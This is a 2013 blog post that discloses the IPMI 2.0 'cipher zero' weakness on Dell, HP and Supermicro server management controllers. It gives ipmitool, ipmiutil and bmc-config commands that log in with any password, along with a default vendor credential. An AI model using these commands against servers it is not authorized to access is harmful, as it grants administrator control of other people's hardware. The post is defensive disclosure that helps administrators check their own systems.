Feb 222013

Now, a few words on looking for things. When you go looking for something specific, your chances of finding it are
very bad. Because of all the things in the world, you’re only looking for one of them. When you go looking for anything at all, your chances of finding it are very good. Because of all the things in the world, you’re sure to find
some of them.

– daryl zero, The Zero Effect

The Zero Effect is a weird, quirky movie about a detective I can relate to, although I’m not as smart. How many times have I looked for that one thing, and then found something more important that had nothing to do with it. Sometimes you simply have to keep your eyes open.

The short version – Cipher Zero is the first Cipher in the IPMI 2.0 spec.  It allows you to authenticate to IPMI without a password – in other words, it’s really no cipher at all, or the un-cipher.  It removes all security from IPMI.  But who cares, really?  Surely vendors wouldn’t turn this on by default, would they?  Well… it’s enabled on my Dell (iDRAC 6), HP (iLO 3), and Supermicro.  That’s all the systems I have access to, presumably there are more. (Important note – it does need a valid user and IPMI channel for it to work, so mostly it wouldn’t work until the box was provisioned or turned on with at least one user.)

Longer version: let’s see, to belabor the obvious. To execute an IPMI command, you can use good ol’ bmc-config with the proper authentication:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p calvin -h –checkout|grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

You know, that line of output is not good. How not good is “not good”? Well, let’s try it again… this time with “FluffyWabbit” as the password:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p FluffyWabbit -h –checkout|grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

I guess this is neat. Or sad. Or something. You can try other passwords to verify FluffyWabbit isn’t some vendor hardcoded backdoor ;)

I believe that IBM, as of the M2/Nehalem generation, has essentially abolished cipher zero through the efforts of Jarred B Johnson (kudos to both!) I’m not sure who else still has this going on… but you might check your own boxes.  It’d be interesting to hear about the vendors that do have this on or off by default.


DISCLAIMER – various versions of the IPMI utilities – including bmc-config – WILL FAIL and give FALSE results!  They do not work correctly with cipher 0 and will fail; this misled me early on on my own boxes. The latest version of freeipmi seems to work on all the ones I’ve tested, at least; make sure you have downloaded the latest copy and try this to verify good ol’ cipher 0 is still around.

Most commands say they support it; ensure you have the latest version, bugs abound out there in the tools and/or in the BMCs, but bmc-config seems pretty solid on this. Some other options for popular utilities:

$ ipmitool -I lanplus -C 0 -H -U admin -P FluffyWabbit lan print

$ ipmiutil lan -J 0 -N -U admin -P FluffyBunny

Ipmiutil has a nice printing of the results – anything in the RMCP+ line that looks like a zero is bad :)

$ ipmitool -I lanplus -C 0 -H -U root -P calvin lan print
Set in Progress : Set Complete
Auth Type Support : NONE MD2 MD5 PASSWORD
Auth Type Enable : Callback : MD2 MD5
: User : MD2 MD5
: Operator : MD2 MD5
: Admin : MD2 MD5
: OEM :
IP Address Source : Static Address
IP Address :
Subnet Mask :
MAC Address : 14:fe:b5:c7:df:28
SNMP Community String : public
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
Default Gateway IP :
Default Gateway MAC : 00:00:00:00:00:00
Backup Gateway IP :
Backup Gateway MAC : 00:00:00:00:00:00
802.1q VLAN ID : Disabled
802.1q VLAN Priority : 0
RMCP+ Cipher Suites : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14
Cipher Suite Priv Max : aaaaaaaaaaaaaaa
: X=Cipher Suite Unused
: u=USER

Sorry, the comment form is closed at this time.